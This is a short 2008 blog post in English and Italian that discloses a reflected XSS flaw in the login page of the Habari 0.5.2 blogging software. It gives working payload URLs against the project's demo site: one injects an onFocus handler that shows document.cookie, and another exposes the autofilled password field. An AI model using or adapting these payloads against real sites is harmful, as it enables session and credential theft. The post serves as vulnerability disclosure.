Tecnologia e Digital Hacks
03-11-2008

Habari 0.5.2 XSS - OWN

Habari Team has not (well) fixed an exploit found in 0.5.1. See Exploit in action: http://demo.habariproject.org/user/login/?habari_username=%22%20onFocus=%22alert(document.cookie) There are a lot of implementations of this XSS. See firefox autocomplete: ..user/login/?habari_username=%22%20onFocus=%22alert(document.forms[0].habari_password.value) ------------------- Exploit XSS nell'ultima versione di Habari. Esempio nella demo ufficiale: http://demo.habariproject.org/user/login/?habari_username=%22%20onFocus=%22alert(document.cookie)

1 Commenti a “Habari 0.5.2 XSS - OWN”

  1. Nick scrive:

    E anche se lo chiudono.. XSS